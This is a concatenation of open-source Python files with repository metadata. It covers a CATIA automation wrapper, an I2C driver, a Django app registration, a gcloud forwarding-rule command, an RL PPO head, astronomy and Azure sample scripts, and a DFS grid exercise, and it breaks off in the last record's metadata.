1c8040e3a1f1d9305eaa363c6c7d055c98c090ac | 42ffb5262adaaaba6477444cbc922c7e119ddb32 | /pycatia/tps_interfaces/particular_tol_elem.py | 14cc5542c7ebbd868c3ac0325b3425b85b072c07 | [
"MIT"
] | permissive | joaoantfig/pycatia | 0bdd03c489c87b982d45617f783b04ce167fd56a | 2d087d9861c76dbcdc4b19d99528d14649d1c45f | refs/heads/master | 2023-09-01T00:00:09.727160 | 2021-09-29T16:17:54 | 2021-09-29T16:17:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,879 | py | #! usr/bin/python3.6
"""
Module initially auto generated using V5Automation files from CATIA V5 R28 on 2020-09-25 14:34:21.593357
.. warning::
The notes denoted "CAA V5 Visual Basic Help" are to be used as reference only.
They are there as a guide as to how the visual basic / catscript functions work
and thus help debugging in pycatia.
"""
from pycatia.system_interfaces.any_object import AnyObject
class ParticularTolElem(AnyObject):
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-09-25 14:34:21.593357)
| System.IUnknown
| System.IDispatch
| System.CATBaseUnknown
| System.CATBaseDispatch
| System.AnyObject
| ParticularTolElem
|
| Interface for accessing particular geometry of the toleranced
| element.
"""
def __init__(self, com_object):
super().__init__(com_object)
self.particular_tol_elem = com_object
@property
def particular_geometry(self) -> str:
"""
.. note::
:class: toggle
CAA V5 Visual Basic Help (2020-09-25 14:34:21.593357)
| o Property ParticularGeometry() As CATBSTR (Read Only)
|
| Retrieves particular geometry of the toleranced element.
|
| Parameters:
|
| oPartGeom
| : Not Defined CenterElement Surface Unsupported
:return: str
:rtype: str
"""
return self.particular_tol_elem.ParticularGeometry
def __repr__(self):
return f'ParticularTolElem(name="{ self.name }")'
| [
"evereux@gmail.com"
] | evereux@gmail.com |
26e4da7286661b314fb390dae31d023f75fe2622 | ad6f20ca36dc65e34b43c69db66f383554718fed | /OOPs/templates.py | 70b0ac5f07ef7984309df506657eb224cfe06582 | [] | no_license | atulanandnitt/questionsBank | 3df734c7389959801ab6447c0959c85f1013dfb8 | 477accc02366b5c4507e14d2d54850a56947c91b | refs/heads/master | 2021-06-11T21:39:24.682159 | 2021-05-06T17:54:18 | 2021-05-06T17:54:18 | 175,861,522 | 0 | 1 | null | 2020-05-02T09:26:25 | 2019-03-15T17:10:06 | Python | UTF-8 | Python | false | false | 873 | py | from string import Template
class MyTemplate(Template):
delimiter = '#'
def Main():
cart = []
cart.append(dict(item='Coke', price=8, qty=1))
cart.append(dict(item='Cake', price=12, qty=2))
cart.append(dict(item='Fish', price=22, qty=4))
t = MyTemplate("#price * #qty = #price")
total = 0
print(cart)
for data in cart:
print(t.substitute(data))
total += data["price"]
print("total " + str(total))
def summation(a,b,*args,**kwargs):
result = a+b
for item in args:
result += int(item)
for key1, val1 in kwargs.items():
result += int(val1)
print("p is ", kwargs['p'])
print("kwargs",kwargs, type(kwargs))
print("args", args, type(args))
return result
if __name__ == "__main__":
Main()
print(summation(1,2,3,4,5,p=1,q=2,r=4))
| [
"atul.anand.nitt@gmail.com"
] | atul.anand.nitt@gmail.com |
69bb140daaed69ba98843a48a802fa8cf3e5a5e5 | a34f722efe6b7b4c102464daebf61450d1fcb774 | /devel/test_series/gridded_noiseless_nofg.py | 41d51d04fafaf91d914ecf980e2b6f806ee8af0c | [
"MIT"
] | permissive | BellaNasirudin/py21cmmc_fg | 4eae59fc5c3647f48a0de5f2963473e92409241a | 928822d07760c481c7673c83c1b7bf4421310b31 | refs/heads/master | 2021-10-10T11:57:57.278899 | 2019-07-26T05:05:45 | 2019-07-26T05:05:45 | 131,949,549 | 1 | 3 | MIT | 2019-02-20T05:14:16 | 2018-05-03T06:10:13 | Jupyter Notebook | UTF-8 | Python | false | false | 876 | py | """
The first test in a series of tests to prove that this code works.
Here are the tests:
1. ** Gridded baselines, no thermal noise, no foregrounds
2. Gridded baselines, thermal noise, no foregrounds
3. MWA baselines, thermal noise, no foregrounds
4. Gridded baselines, thermal noise, point-source foregrounds
5. MWA baselines, thermal noise, point-source foregrounds
"""
from base_definitions import CustomCoreInstrument, CustomLikelihood, core_eor, run_mcmc, DEBUG
model_name = "InstrumentalGridTest"
core_instr = CustomCoreInstrument(
antenna_posfile = 'grid_centres', # use a special grid of *baselines*.
Tsys = 0,
)
likelihood = CustomLikelihood(
datafile=[f'data/{model_name}.npz']
)
if __name__== "__main__":
chain = run_mcmc(
[core_eor, core_instr], likelihood,
model_name=model_name, # Filename of main chain output
)
| [
"steven.murray@curtin.edu.au"
] | steven.murray@curtin.edu.au |
571e9c49ac89ab60c4939efda633234705c25958 | c1960138a37d9b87bbc6ebd225ec54e09ede4a33 | /adafruit-circuitpython-bundle-py-20210402/lib/adafruit_mcp230xx/mcp230xx.py | 23b64f8c9d08030a7bc42a7c1083c134cdb63a14 | [] | no_license | apalileo/ACCD_PHCR_SP21 | 76d0e27c4203a2e90270cb2d84a75169f5db5240 | 37923f70f4c5536b18f0353470bedab200c67bad | refs/heads/main | 2023-04-07T00:01:35.922061 | 2021-04-15T18:02:22 | 2021-04-15T18:02:22 | 332,101,844 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,153 | py | # SPDX-FileCopyrightText: 2017 Tony DiCola for Adafruit Industries
# SPDX-FileCopyrightText: 2019 Carter Nelson
#
# SPDX-License-Identifier: MIT
"""
`mcp230xx`
====================================================
CircuitPython module for the MCP23017 and MCP23008 I2C I/O extenders.
* Author(s): Tony DiCola
"""
from adafruit_bus_device import i2c_device
__version__ = "2.4.5"
__repo__ = "https://github.com/adafruit/Adafruit_CircuitPython_MCP230xx.git"
# Global buffer for reading and writing registers with the devices. This is
# shared between both the MCP23008 and MCP23017 class to reduce memory allocations.
# However this is explicitly not thread safe or re-entrant by design!
_BUFFER = bytearray(3)
# pylint: disable=too-few-public-methods
class MCP230XX:
"""Base class for MCP230xx devices."""
def __init__(self, i2c, address):
self._device = i2c_device.I2CDevice(i2c, address)
def _read_u16le(self, register):
# Read an unsigned 16 bit little endian value from the specified 8-bit
# register.
with self._device as i2c:
_BUFFER[0] = register & 0xFF
i2c.write_then_readinto(_BUFFER, _BUFFER, out_end=1, in_start=1, in_end=3)
return (_BUFFER[2] << 8) | _BUFFER[1]
def _write_u16le(self, register, val):
# Write an unsigned 16 bit little endian value to the specified 8-bit
# register.
with self._device as i2c:
_BUFFER[0] = register & 0xFF
_BUFFER[1] = val & 0xFF
_BUFFER[2] = (val >> 8) & 0xFF
i2c.write(_BUFFER, end=3)
def _read_u8(self, register):
# Read an unsigned 8 bit value from the specified 8-bit register.
with self._device as i2c:
_BUFFER[0] = register & 0xFF
i2c.write_then_readinto(_BUFFER, _BUFFER, out_end=1, in_start=1, in_end=2)
return _BUFFER[1]
def _write_u8(self, register, val):
# Write an 8 bit value to the specified 8-bit register.
with self._device as i2c:
_BUFFER[0] = register & 0xFF
_BUFFER[1] = val & 0xFF
i2c.write(_BUFFER, end=2)
| [
"55570902+apalileo@users.noreply.github.com"
] | 55570902+apalileo@users.noreply.github.com |
a4e594df686f039ef10ff36ac5c9d74f148dde7e | 7cd760f1a570155ad001e53dd34cf7b5451bc099 | /mkt/installs/api.py | 7c584778313ea7bd8232dd6f95312c706f5fa19c | [] | no_license | l-hedgehog/zamboni | 6bab963b334a32bfc9b2e986dc657510f3d10602 | ef1f1849f42023bc684866879c854cdb84eef2f6 | refs/heads/master | 2020-12-25T00:28:19.982297 | 2013-08-21T23:34:35 | 2013-08-21T23:34:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,770 | py | from django.core.exceptions import PermissionDenied
import commonware.log
from rest_framework.decorators import (api_view, authentication_classes,
parser_classes, permission_classes)
from rest_framework.parsers import FormParser, JSONParser
from rest_framework.permissions import AllowAny
from rest_framework.response import Response
from mkt.api.authentication import (RestOAuthAuthentication,
RestSharedSecretAuthentication)
from mkt.constants.apps import INSTALL_TYPE_USER
from mkt.installs.forms import InstallForm
from mkt.installs.utils import install_type, record
from mkt.webapps.models import Installed
log = commonware.log.getLogger('z.api')
@api_view(['POST'])
@authentication_classes([RestOAuthAuthentication,
RestSharedSecretAuthentication])
@parser_classes([JSONParser, FormParser])
@permission_classes([AllowAny])
def install(request):
request._request.CORS = ['POST']
form = InstallForm(request.DATA, request=request)
if form.is_valid():
app = form.cleaned_data['app']
type_ = install_type(request, app)
# Users can't install public apps. Developers can though.
if not app.is_public() and type_ == INSTALL_TYPE_USER:
log.info('App not public: {0}'.format(app.pk))
raise PermissionDenied
if not request.amo_user:
record(request, app)
else:
installed, created = Installed.objects.get_or_create(
addon=app, user=request.amo_user, install_type=type_)
record(request, app)
if not created:
return Response(status=202)
return Response(status=201)
return Response(status=400)
| [
"amckay@mozilla.com"
] | amckay@mozilla.com |
9e599c20eb958a60b433edc477eca5ad091b8145 | a3cc7286d4a319cb76f3a44a593c4a18e5ddc104 | /lib/surface/compute/forwarding_rules/update.py | 1acf8e2ad2ecc220e60a5d576a2601ac864ccd9f | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | jordanistan/Google-Cloud-SDK | f2c6bb7abc2f33b9dfaec5de792aa1be91154099 | 42b9d7914c36a30d1e4b84ae2925df7edeca9962 | refs/heads/master | 2023-09-01T01:24:53.495537 | 2023-08-22T01:12:23 | 2023-08-22T01:12:23 | 127,072,491 | 0 | 1 | NOASSERTION | 2023-08-22T01:12:24 | 2018-03-28T02:31:19 | Python | UTF-8 | Python | false | false | 10,113 | py | # Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Command to update forwarding-rules."""
from googlecloudsdk.api_lib.compute import base_classes
from googlecloudsdk.api_lib.compute import constants
from googlecloudsdk.api_lib.compute.operations import poller
from googlecloudsdk.api_lib.util import waiter
from googlecloudsdk.calliope import base
from googlecloudsdk.calliope import exceptions as calliope_exceptions
from googlecloudsdk.command_lib.compute import flags as compute_flags
from googlecloudsdk.command_lib.compute.forwarding_rules import flags
from googlecloudsdk.command_lib.util.args import labels_util
def _Args(cls, parser):
cls.FORWARDING_RULE_ARG = flags.ForwardingRuleArgument()
cls.FORWARDING_RULE_ARG.AddArgument(parser)
labels_util.AddUpdateLabelsFlags(parser)
@base.ReleaseTracks(base.ReleaseTrack.BETA)
class Update(base.UpdateCommand):
r"""Update a Google Compute Engine forwarding rule.
*{command}* updates labels for a Google Compute Engine
forwarding rule. For example:
$ {command} example-fr --region us-central1 \
--update-labels=k0=value1,k1=value2 --remove-labels=k3
will add/update labels ``k0'' and ``k1'' and remove labels with key ``k3''.
Labels can be used to identify the forwarding rule and to filter them as in
$ {parent_command} list --filter='labels.k1:value2'
To list existing labels
$ {parent_command} describe example-fr --format='default(labels)'
"""
FORWARDING_RULE_ARG = None
@classmethod
def Args(cls, parser):
_Args(cls, parser)
def _CreateGlobalSetLabelsRequest(self, messages, forwarding_rule_ref,
forwarding_rule, replacement):
return messages.ComputeGlobalForwardingRulesSetLabelsRequest(
project=forwarding_rule_ref.project,
resource=forwarding_rule_ref.Name(),
globalSetLabelsRequest=messages.GlobalSetLabelsRequest(
labelFingerprint=forwarding_rule.labelFingerprint,
labels=replacement))
def _CreateRegionalSetLabelsRequest(self, messages, forwarding_rule_ref,
forwarding_rule, replacement):
return messages.ComputeForwardingRulesSetLabelsRequest(
project=forwarding_rule_ref.project,
resource=forwarding_rule_ref.Name(),
region=forwarding_rule_ref.region,
regionSetLabelsRequest=messages.RegionSetLabelsRequest(
labelFingerprint=forwarding_rule.labelFingerprint,
labels=replacement))
def Run(self, args):
holder = base_classes.ComputeApiHolder(self.ReleaseTrack())
client = holder.client.apitools_client
messages = holder.client.messages
forwarding_rule_ref = self.FORWARDING_RULE_ARG.ResolveAsResource(
args,
holder.resources,
scope_lister=compute_flags.GetDefaultScopeLister(holder.client))
labels_diff = labels_util.Diff.FromUpdateArgs(args)
if not labels_diff.MayHaveUpdates():
raise calliope_exceptions.RequiredArgumentException(
'LABELS', 'At least one of --update-labels or '
'--remove-labels must be specified.')
if forwarding_rule_ref.Collection() == 'compute.globalForwardingRules':
forwarding_rule = client.globalForwardingRules.Get(
messages.ComputeGlobalForwardingRulesGetRequest(
**forwarding_rule_ref.AsDict()))
labels_value = messages.GlobalSetLabelsRequest.LabelsValue
else:
forwarding_rule = client.forwardingRules.Get(
messages.ComputeForwardingRulesGetRequest(
**forwarding_rule_ref.AsDict()))
labels_value = messages.RegionSetLabelsRequest.LabelsValue
labels_update = labels_diff.Apply(labels_value, forwarding_rule.labels)
if not labels_update.needs_update:
return forwarding_rule
if forwarding_rule_ref.Collection() == 'compute.globalForwardingRules':
request = self._CreateGlobalSetLabelsRequest(
messages, forwarding_rule_ref, forwarding_rule, labels_update.labels)
operation = client.globalForwardingRules.SetLabels(request)
operation_ref = holder.resources.Parse(
operation.selfLink, collection='compute.globalOperations')
operation_poller = poller.Poller(client.globalForwardingRules)
else:
request = self._CreateRegionalSetLabelsRequest(
messages, forwarding_rule_ref, forwarding_rule, labels_update.labels)
operation = client.forwardingRules.SetLabels(request)
operation_ref = holder.resources.Parse(
operation.selfLink, collection='compute.regionOperations')
operation_poller = poller.Poller(client.forwardingRules)
return waiter.WaitFor(operation_poller, operation_ref,
'Updating labels of forwarding rule [{0}]'.format(
forwarding_rule_ref.Name()))
@base.ReleaseTracks(base.ReleaseTrack.ALPHA)
class UpdateAlpha(Update):
r"""Update a Google Compute Engine forwarding rule.
*{command}* updates labels and network tier for a Google Compute Engine
forwarding rule.
Example to update labels:
$ {command} example-fr --region us-central1 \
--update-labels=k0=value1,k1=value2 --remove-labels=k3
will add/update labels ``k0'' and ``k1'' and remove labels with key ``k3''.
Labels can be used to identify the forwarding rule and to filter them as in
$ {parent_command} list --filter='labels.k1:value2'
To list existing labels
$ {parent_command} describe example-fr --format='default(labels)'
"""
@classmethod
def Args(cls, parser):
_Args(cls, parser)
flags.AddNetworkTier(parser, include_alpha=True, for_update=True)
def ConstructNetworkTier(self, messages, network_tier):
if network_tier:
network_tier = network_tier.upper()
if network_tier in constants.NETWORK_TIER_CHOICES_FOR_INSTANCE:
return messages.ForwardingRule.NetworkTierValueValuesEnum(network_tier)
else:
raise calliope_exceptions.InvalidArgumentException(
'--network-tier',
'Invalid network tier [{tier}]'.format(tier=network_tier))
else:
return
def Modify(self, messages, args, existing):
"""Returns a modified forwarding rule message and included fields."""
if args.network_tier is None:
return None
else:
return messages.ForwardingRule(
name=existing.name,
networkTier=self.ConstructNetworkTier(messages, args.network_tier))
def Run(self, args):
"""Returns a list of requests necessary for updating forwarding rules."""
holder = base_classes.ComputeApiHolder(self.ReleaseTrack())
client = holder.client.apitools_client
messages = holder.client.messages
forwarding_rule_ref = self.FORWARDING_RULE_ARG.ResolveAsResource(
args,
holder.resources,
scope_lister=compute_flags.GetDefaultScopeLister(holder.client))
labels_diff = labels_util.Diff.FromUpdateArgs(args)
if not labels_diff.MayHaveUpdates() and args.network_tier is None:
raise calliope_exceptions.ToolException(
'At least one property must be specified.')
# Get replacement.
if forwarding_rule_ref.Collection() == 'compute.globalForwardingRules':
get_request = (client.globalForwardingRules, 'Get',
messages.ComputeGlobalForwardingRulesGetRequest(
forwardingRule=forwarding_rule_ref.Name(),
project=forwarding_rule_ref.project))
labels_value = messages.GlobalSetLabelsRequest.LabelsValue
else:
get_request = (client.forwardingRules, 'Get',
messages.ComputeForwardingRulesGetRequest(
forwardingRule=forwarding_rule_ref.Name(),
project=forwarding_rule_ref.project,
region=forwarding_rule_ref.region))
labels_value = messages.RegionSetLabelsRequest.LabelsValue
objects = holder.client.MakeRequests([get_request])
forwarding_rule = objects[0]
forwarding_rule_replacement = self.Modify(messages, args, forwarding_rule)
label_update = labels_diff.Apply(labels_value, forwarding_rule.labels)
# Create requests.
requests = []
if forwarding_rule_ref.Collection() == 'compute.globalForwardingRules':
if forwarding_rule_replacement:
request = messages.ComputeGlobalForwardingRulesPatchRequest(
forwardingRule=forwarding_rule_ref.Name(),
forwardingRuleResource=forwarding_rule_replacement,
project=forwarding_rule_ref.project)
requests.append((client.globalForwardingRules, 'Patch', request))
if label_update.needs_update:
request = self._CreateGlobalSetLabelsRequest(
messages, forwarding_rule_ref, forwarding_rule, label_update.labels)
requests.append((client.globalForwardingRules, 'SetLabels', request))
else:
if forwarding_rule_replacement:
request = messages.ComputeForwardingRulesPatchRequest(
forwardingRule=forwarding_rule_ref.Name(),
forwardingRuleResource=forwarding_rule_replacement,
project=forwarding_rule_ref.project,
region=forwarding_rule_ref.region)
requests.append((client.forwardingRules, 'Patch', request))
if label_update.needs_update:
request = self._CreateRegionalSetLabelsRequest(
messages, forwarding_rule_ref, forwarding_rule, label_update.labels)
requests.append((client.forwardingRules, 'SetLabels', request))
return holder.client.MakeRequests(requests)
| [
"jordan.robison@gmail.com"
] | jordan.robison@gmail.com |
ab618756d18481095af581ec2784df2054af7044 | 5abdbe26ad89d50761e505d02c35ea184d79f712 | /learning_logs/admin.py | a1d4a285a35b36f507aeeeb683fe621de3031bd8 | [] | no_license | liyongjun-brayan/xuexi | 5c00abaeadb46caa4a63fdcd316fabd2d1ebdb15 | b5356a5115b34dc1d5f627215aef780d7d5a0693 | refs/heads/master | 2021-06-25T10:25:12.602434 | 2019-08-27T02:27:23 | 2019-08-27T02:27:23 | 204,632,981 | 1 | 0 | null | 2021-06-10T21:54:15 | 2019-08-27T06:16:39 | Python | UTF-8 | Python | false | false | 167 | py | from django.contrib import admin
# Register your models here.
from learning_logs.models import Topic, Entry
admin.site.register(Topic)
admin.site.register(Entry)
| [
"johndoe@example.com"
] | johndoe@example.com |
409be856f4a7e354eaeef1155234db833b8c60d9 | efe036849aa46755d5dcc86dbdb682b750a318eb | /rl_coach/architectures/tensorflow_components/heads/ppo_head.py | 755ffa656b0bb7ced7c2efda502d88e03389f0c4 | [
"Apache-2.0"
] | permissive | danialkamran/coach | a1284b54f8cd59b9e7e1f49e55a31484fffd89cd | a4471389a429793fd871b225d3aaccbcf4c676ec | refs/heads/master | 2020-03-26T22:01:54.656300 | 2018-08-20T10:50:09 | 2018-08-20T10:50:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,153 | py | #
# Copyright (c) 2017 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import numpy as np
import tensorflow as tf
from rl_coach.base_parameters import AgentParameters
from rl_coach.spaces import BoxActionSpace, DiscreteActionSpace
from rl_coach.spaces import SpacesDefinition
from rl_coach.utils import eps
from rl_coach.architectures.tensorflow_components.heads.head import Head, HeadParameters, normalized_columns_initializer
from rl_coach.core_types import ActionProbabilities
class PPOHeadParameters(HeadParameters):
def __init__(self, activation_function: str ='tanh', name: str='ppo_head_params'):
super().__init__(parameterized_class=PPOHead, activation_function=activation_function, name=name)
class PPOHead(Head):
def __init__(self, agent_parameters: AgentParameters, spaces: SpacesDefinition, network_name: str,
head_idx: int = 0, loss_weight: float = 1., is_local: bool = True, activation_function: str='tanh'):
super().__init__(agent_parameters, spaces, network_name, head_idx, loss_weight, is_local, activation_function)
self.name = 'ppo_head'
self.return_type = ActionProbabilities
# used in regular PPO
self.use_kl_regularization = agent_parameters.algorithm.use_kl_regularization
if self.use_kl_regularization:
# kl coefficient and its corresponding assignment operation and placeholder
self.kl_coefficient = tf.Variable(agent_parameters.algorithm.initial_kl_coefficient,
trainable=False, name='kl_coefficient')
self.kl_coefficient_ph = tf.placeholder('float', name='kl_coefficient_ph')
self.assign_kl_coefficient = tf.assign(self.kl_coefficient, self.kl_coefficient_ph)
self.kl_cutoff = 2 * agent_parameters.algorithm.target_kl_divergence
self.high_kl_penalty_coefficient = agent_parameters.algorithm.high_kl_penalty_coefficient
self.clip_likelihood_ratio_using_epsilon = agent_parameters.algorithm.clip_likelihood_ratio_using_epsilon
self.beta = agent_parameters.algorithm.beta_entropy
def _build_module(self, input_layer):
if isinstance(self.spaces.action, DiscreteActionSpace):
self._build_discrete_net(input_layer, self.spaces.action)
elif isinstance(self.spaces.action, BoxActionSpace):
self._build_continuous_net(input_layer, self.spaces.action)
else:
raise ValueError("only discrete or continuous action spaces are supported for PPO")
self.action_probs_wrt_policy = self.policy_distribution.log_prob(self.actions)
self.action_probs_wrt_old_policy = self.old_policy_distribution.log_prob(self.actions)
self.entropy = tf.reduce_mean(self.policy_distribution.entropy())
# Used by regular PPO only
# add kl divergence regularization
self.kl_divergence = tf.reduce_mean(tf.distributions.kl_divergence(self.old_policy_distribution, self.policy_distribution))
if self.use_kl_regularization:
# no clipping => use kl regularization
self.weighted_kl_divergence = tf.multiply(self.kl_coefficient, self.kl_divergence)
self.regularizations = self.weighted_kl_divergence + self.high_kl_penalty_coefficient * \
tf.square(tf.maximum(0.0, self.kl_divergence - self.kl_cutoff))
tf.add_to_collection(tf.GraphKeys.REGULARIZATION_LOSSES, self.regularizations)
# calculate surrogate loss
self.advantages = tf.placeholder(tf.float32, [None], name="advantages")
self.target = self.advantages
# action_probs_wrt_old_policy != 0 because it is e^...
self.likelihood_ratio = tf.exp(self.action_probs_wrt_policy - self.action_probs_wrt_old_policy)
if self.clip_likelihood_ratio_using_epsilon is not None:
self.clip_param_rescaler = tf.placeholder(tf.float32, ())
self.input.append(self.clip_param_rescaler)
max_value = 1 + self.clip_likelihood_ratio_using_epsilon * self.clip_param_rescaler
min_value = 1 - self.clip_likelihood_ratio_using_epsilon * self.clip_param_rescaler
self.clipped_likelihood_ratio = tf.clip_by_value(self.likelihood_ratio, min_value, max_value)
self.scaled_advantages = tf.minimum(self.likelihood_ratio * self.advantages,
self.clipped_likelihood_ratio * self.advantages)
else:
self.scaled_advantages = self.likelihood_ratio * self.advantages
# minus sign is in order to set an objective to minimize (we actually strive for maximizing the surrogate loss)
self.surrogate_loss = -tf.reduce_mean(self.scaled_advantages)
if self.is_local:
# add entropy regularization
if self.beta:
self.entropy = tf.reduce_mean(self.policy_distribution.entropy())
self.regularizations = -tf.multiply(self.beta, self.entropy, name='entropy_regularization')
tf.add_to_collection(tf.GraphKeys.REGULARIZATION_LOSSES, self.regularizations)
self.loss = self.surrogate_loss
tf.losses.add_loss(self.loss)
def _build_discrete_net(self, input_layer, action_space):
num_actions = len(action_space.actions)
self.actions = tf.placeholder(tf.int32, [None], name="actions")
self.old_policy_mean = tf.placeholder(tf.float32, [None, num_actions], "old_policy_mean")
self.old_policy_std = tf.placeholder(tf.float32, [None, num_actions], "old_policy_std")
# Policy Head
self.input = [self.actions, self.old_policy_mean]
policy_values = tf.layers.dense(input_layer, num_actions, name='policy_fc')
self.policy_mean = tf.nn.softmax(policy_values, name="policy")
# define the distributions for the policy and the old policy
self.policy_distribution = tf.contrib.distributions.Categorical(probs=self.policy_mean)
self.old_policy_distribution = tf.contrib.distributions.Categorical(probs=self.old_policy_mean)
self.output = self.policy_mean
def _build_continuous_net(self, input_layer, action_space):
num_actions = action_space.shape[0]
self.actions = tf.placeholder(tf.float32, [None, num_actions], name="actions")
self.old_policy_mean = tf.placeholder(tf.float32, [None, num_actions], "old_policy_mean")
self.old_policy_std = tf.placeholder(tf.float32, [None, num_actions], "old_policy_std")
self.input = [self.actions, self.old_policy_mean, self.old_policy_std]
self.policy_mean = tf.layers.dense(input_layer, num_actions, name='policy_mean',
kernel_initializer=normalized_columns_initializer(0.01))
if self.is_local:
self.policy_logstd = tf.Variable(np.zeros((1, num_actions)), dtype='float32',
collections=[tf.GraphKeys.LOCAL_VARIABLES])
else:
self.policy_logstd = tf.Variable(np.zeros((1, num_actions)), dtype='float32')
self.policy_std = tf.tile(tf.exp(self.policy_logstd), [tf.shape(input_layer)[0], 1], name='policy_std')
# define the distributions for the policy and the old policy
self.policy_distribution = tf.contrib.distributions.MultivariateNormalDiag(self.policy_mean, self.policy_std + eps)
self.old_policy_distribution = tf.contrib.distributions.MultivariateNormalDiag(self.old_policy_mean, self.old_policy_std + eps)
self.output = [self.policy_mean, self.policy_std]
| [
"gal.novik@intel.com"
] | gal.novik@intel.com |
60880b307495d767154fe596f68b0a05c24e4934 | 9e988c0dfbea15cd23a3de860cb0c88c3dcdbd97 | /sdBs/AllRun/he_0532-4503/sdB_HE_0532-4503_lc.py | 5fe4f20f7122fe6399d904e826635f483dd2d08c | [] | no_license | tboudreaux/SummerSTScICode | 73b2e5839b10c0bf733808f4316d34be91c5a3bd | 4dd1ffbb09e0a599257d21872f9d62b5420028b0 | refs/heads/master | 2021-01-20T18:07:44.723496 | 2016-08-08T16:49:53 | 2016-08-08T16:49:53 | 65,221,159 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 347 | py | from gPhoton.gAperture import gAperture
def main():
gAperture(band="NUV", skypos=[83.41875,-45.026469], stepsz=30., csvfile="/data2/fleming/GPHOTON_OUTPU/LIGHTCURVES/sdBs/sdB_HE_0532-4503 /sdB_HE_0532-4503_lc.csv", maxgap=1000., overwrite=True, radius=0.00555556, annulus=[0.005972227,0.0103888972], verbose=3)
if __name__ == "__main__":
main()
| [
"thomas@boudreauxmail.com"
] | thomas@boudreauxmail.com |
4ce1e2145bd1edf9bd044808195879cc321dd342 | f576f0ea3725d54bd2551883901b25b863fe6688 | /sdk/datashare/azure-mgmt-datashare/generated_samples/email_registrations_register_email.py | bdce504aee2c308cacde889689874a6961ecd619 | [
"LicenseRef-scancode-generic-cla",
"MIT",
"LGPL-2.1-or-later"
] | permissive | Azure/azure-sdk-for-python | 02e3838e53a33d8ba27e9bcc22bd84e790e4ca7c | c2ca191e736bb06bfbbbc9493e8325763ba990bb | refs/heads/main | 2023-09-06T09:30:13.135012 | 2023-09-06T01:08:06 | 2023-09-06T01:08:06 | 4,127,088 | 4,046 | 2,755 | MIT | 2023-09-14T21:48:49 | 2012-04-24T16:46:12 | Python | UTF-8 | Python | false | false | 1,540 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.identity import DefaultAzureCredential
from azure.mgmt.datashare import DataShareManagementClient
"""
# PREREQUISITES
pip install azure-identity
pip install azure-mgmt-datashare
# USAGE
python email_registrations_register_email.py
Before run the sample, please set the values of the client ID, tenant ID and client secret
of the AAD application as environment variables: AZURE_CLIENT_ID, AZURE_TENANT_ID,
AZURE_CLIENT_SECRET. For more info about how to get the value, please see:
https://docs.microsoft.com/azure/active-directory/develop/howto-create-service-principal-portal
"""
def main():
client = DataShareManagementClient(
credential=DefaultAzureCredential(),
subscription_id="SUBSCRIPTION_ID",
)
response = client.email_registrations.register_email(
location="East US 2",
)
print(response)
# x-ms-original-file: specification/datashare/resource-manager/Microsoft.DataShare/stable/2020-09-01/examples/EmailRegistrations_RegisterEmail.json
if __name__ == "__main__":
main()
| [
"noreply@github.com"
] | Azure.noreply@github.com |
a76680334402715f6493dcd8c93f9120713d231b | 25fa5fdc9f67738332bd6f95a1e4f038cd286890 | /이것이 코딩테스트다/ch05_DFS:BFS/음료수 얼려 먹기.py | d8e484185f873f9fe701d264e79b7d3577dd241e | [] | no_license | mandos1995/online_judge | b0cfd56e3391495f22b9832895cddcea70334349 | 9b90bffdcbfb5369e8dd5dafbb07f8e9e7050617 | refs/heads/main | 2023-08-02T19:29:03.716295 | 2021-10-04T15:10:34 | 2021-10-04T15:10:34 | 329,517,747 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,010 | py | # n, m을 공백으로 구분하여 입력받기
n, m = map(int, input().split())
# 2차원 리스트의 맵 정보 입력받기
graph = []
for i in range(n):
graph.append(list(map(int, input())))
# DFS로 특정한 노드를 방문한 뒤에 연결된 모든 노드들도 방문
def dfs(x, y):
# 주어진 범위를 벗어나는 경우에는 즉시 종료
if x <= -1 or x >= n or y <= -1 or y>= m:
return False
# 현재 노드를 아직 방문하지 않았다면
if graph[x][y] == 0:
# 해당 노드 방문 처리
graph[x][y] = 1
# 상, 하, 좌, 우의 위치도 모두 재귀적으로 호출
dfs(x - 1, y)
dfs(x, y - 1)
dfs(x + 1, y)
dfs(x, y + 1)
return True
return False
# 모든 노드(위치)에 대하여 음료수 채우기
result = 0
for i in range(n):
for j in range(m):
# 현재 위치에서 DFS 수행
if dfs(i, j) == True:
result += 1
# 정답 출력
print(result) | [
"mandos19950620@gmail.com"
] | mandos19950620@gmail.com |
5ad81796a5241330f88f92f45f79a5872d510001 | e944d288093c9234c3a6a2a76ffe4e3c9b236cf1 | /build/lib/annotation_utils/labelme/structs/__init__.py | aaa1bbe76f1ee7e19833c84476e97f5d662ef39a | [
"MIT"
